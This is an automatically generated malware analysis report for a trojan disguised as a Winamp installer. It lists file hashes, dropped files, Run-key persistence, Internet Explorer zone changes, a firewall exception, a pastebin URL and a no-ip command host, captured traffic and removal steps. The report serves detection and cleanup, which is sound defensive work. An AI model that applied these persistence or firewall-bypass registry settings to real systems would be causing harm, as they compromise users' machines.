Trojan.GenericKD.3075701_6b2a96bc3d

by malwarelabrobot on April 16th, 2016 in Malware Descriptions.

Trojan.MSIL.Zapchast.aehog (Kaspersky), Trojan.GenericKD.3075701 (AdAware), Installer.Win32.SmartIM.FD, InstallerSmartIM.YR (Lavasoft MAS)
Behaviour: Trojan, Installer


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 6b2a96bc3d18a5d5546eeb363f8585f1
SHA1: 9d067a565429a17951e389465e4b4d70246dc366
SHA256: 9e311091090cb688be24f80e6ab648f085f62c784fe4c7d8a4e93b838c1534bb
SSDeep: 393216:g6Pb7dod23L0btVB0AAupxr3hBmgfjDO9WlcKOyul0e1:gKb7W2b0plr3bmgfjDMWUy J1
Size: 17302542 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

downloader c sharp.exe:652
%original file name%.exe:632
netsh.exe:1480

The Trojan injects its code into the following process(es):

teskmanger.exe:516
winamp5666_full_all.exe:580

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process downloader c sharp.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)

The process %original file name%.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
%Program Files%\winamp5666_full_all.exe (390963 bytes)
%Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
%Program Files%\downloader c sharp.exe (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (0 bytes)

The process winamp5666_full_all.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp (0 bytes)

Registry activity

The process downloader c sharp.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 6A 38 64 3F 1F 15 E9 E1 0E 96 A9 8C BC 1E 3F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU]
"di" = "!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "FireFox"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process teskmanger.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 76 5D F1 EE 84 42 CF CB 42 D1 2B 8F 34 E1 CF"

[HKCU\Software\17c320a39f13ba5af3ce000a29a3404e]
"[kl]" = ""

[HKCU]
"di" = "!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Environment]
"SEE_MASK_NOZONECHECKS" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

The process %original file name%.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"InstallSource" = "c:\"
"InstallDate" = "20160415"
"EstimatedSize" = "16922"
"UninstallString" = "%Program Files%\winamp\winamp\Uninstall.exe"

"DisplayVersion" = "5.666"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"downloader c sharp.exe" = "FireFox"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"Publisher" = "winamp"
"VersionMajor" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayIcon" = "%Program Files%\winamp\winamp\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"winamp5666_full_all.exe" = "Winamp Installer"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 F2 01 E6 31 A2 5B AB ED CF 1F 9D 55 03 AC 72"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayName" = "winamp 5.666"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\winamp\winamp\"
"Language" = "1033"
"VersionMinor" = "666"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process netsh.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 7D B4 FE 46 CC 89 60 0D E7 3F A4 47 72 BD E5"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the Windows Firewall which allows any network activity for the dropped file:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe:*:Enabled:teskmanger.exe"

The process winamp5666_full_all.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 40 0F 2A A8 D8 A1 71 9F 75 F6 D9 FF 60 71 46"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
227c6a6f69e227d79f08e44ee685785e c:\Documents and Settings\"%CurrentUserName%"\Application Data\teskmanger.exe
a1cd3f159ef78d9ace162f067b544fd9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\LangDLL.dll
bf712f32249029466fa86756f5546950 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\System.dll
227c6a6f69e227d79f08e44ee685785e c:\Program Files\downloader c sharp.exe
110cd80079e9572aef511b0491e63b8c c:\Program Files\winamp5666_full_all.exe
96360030a40dc543d5347e1cf917f530 c:\Program Files\winamp\winamp\Uninstall.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: winamp
Product Name:
Product Version:
Legal Copyright: winamp
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.666
File Description: winamp 5.666 Installation
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 148684 148992 4.57091 5e14e4ede2e2215bc7d72837b9871f8f
DATA 155648 10388 10752 2.62963 abafcbfbd7f8ac0226ca496a92a0cf06
BSS 167936 4341 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 176128 6040 6144 3.3864 a4e0ac39d5ed487ceea059fa23dfce5e
.tls 184320 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 188416 24 512 0.14174 c4fdd0c5c9efb616fcc85d66056ca490
.reloc 192512 6276 6656 4.56552 867a1120317d51734587a74f6ee70016
.rsrc 200704 7388 7680 3.29485 0ca03688054739a451150988e825bf9e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 8

URLs

URL IP
hxxp://pastebin.com/raw/U2sjN8vL 104.20.63.56
qanasjrema.no-ip.biz 62.16.66.195


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:39 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d27769c06538c3575da5b7981848a85761460674359; expires=Fri, 14-Apr-17 22:52:39 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: HIT
Expires: Thu, 14 Apr 2016 23:22:40 GMT
Server: cloudflare-nginx
CF-RAY: 293abab8081b16be-ARN

<<< skipped >>>

GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:32 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d057bf8bde70568e9fc963af32899d2721460674352; expires=Fri, 14-Apr-17 22:52:32 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Expires: Thu, 14 Apr 2016 23:22:33 GMT
Server: cloudflare-nginx
CF-RAY: 293aba8c3063373e-ARN

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_632:

.idata
.rdata
P.reloc
P.rsrc
uxtheme.dll
;CRt$
PSAPI.dll
kernel32.dll
1.1.4
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
URLInfoAbout
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
WinExec
gdi32.dll
GetKeyState
ExitWindowsEx
EnumWindows
winmm.dll
ole32.dll
comctl32.dll
shell32.dll
GetWindowsDirectoryA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteA
cabinet.dll
KWindows
UrlMon
version="1.0.0.0"
name="Microsoft.Windows.SIM"
<requestedExecutionLevel level="requireAdministrator"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"

winamp5666_full_all.exe_580:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
PeekNamedPipe
CreatePipe
nsExec.dll
GetProcessHeap
COMDLG32.dll
nsDialogs.dll
System.dll
Dialer.dll
LangDLL.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
All Files|*.*
callback%d
kernel32.dll
wininet.dll
nsg3.tmp
File: wrote 5120 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll"
~1\Temp\nsg3.tmp\LangDLL.dll"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
:\Program Files\winamp5666_full_all.exe"
"%Program Files%\winamp5666_full_all.exe"
%Program Files%\Winamp
%Program Files%
winamp5666_full_all.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\winamp5666_full_all.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\install.ini
Visit hXXp://VVV.winamp.com/ for updates.
5.6.6.3516

teskmanger.exe_516_rwx_0099A000_00002000:


teskmanger.exe_516_rwx_675A6000_00003000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    downloader c sharp.exe:652
    %original file name%.exe:632
    netsh.exe:1480

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
    %Program Files%\winamp5666_full_all.exe (390963 bytes)
    %Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
    %Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
    %Program Files%\downloader c sharp.exe (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
